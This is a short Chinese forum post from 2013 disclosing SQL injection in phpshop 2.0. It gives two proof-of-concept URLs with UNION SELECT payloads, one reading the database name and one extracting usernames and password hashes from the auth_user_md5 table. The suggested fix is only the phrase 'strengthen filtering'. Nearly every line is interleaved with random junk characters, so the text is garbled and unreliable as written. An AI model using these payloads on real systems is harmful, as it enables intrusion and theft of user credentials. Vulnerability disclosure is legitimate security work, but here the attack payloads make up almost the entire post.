标题 : phpshop 2.0 SQL Injection Vulnerability+ {$ }" x: Z h) T, ?6 L
4 `, z+ ?8 h5 v作者 : By onestree
* ~% _* ?5 v% x. G: V下载地址 : http://code.google.com/p/phpshop/downloads/list
7 R+ ^* _, D; t5 W/ R测试地址: windows 7 / ubuntu# A T# f1 q9 z: `5 R7 @1 z7 ^
5 ?/ F& ?; { d, {* p4 L" D3 w" c' X4 D
( M# Q$ ]; k2 H3 pSQLi p0c:2 K/ x0 j( E- v$ b8 p' z
# p0 ]) y+ N; r& P2 y5 ~2 p% q
==================
1 v: U1 p3 \) [# C- N. O8 W" E8 h. U
- V4 _2 T" G# Thttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'/ \% C6 t6 @+ X& w9 [/ b! P
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
# u$ v0 J6 ~, h+ f
. s. e7 p) |0 Yhttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--( E5 a/ N. A. O# X+ Z$ p+ i
$ x i) a, H- C6 B5 q7 y0 ]- I, q修复:
( W4 t3 v7 d8 H' p e N加强过滤$ P* d% |6 O! }$ k
2 z+ S* U" r+ s9 t6 P' ` Z
1 F* H1 B( a. M B) s; B! }$ j |
发表于 2013-1-18 18:24:10
收藏
支持
反对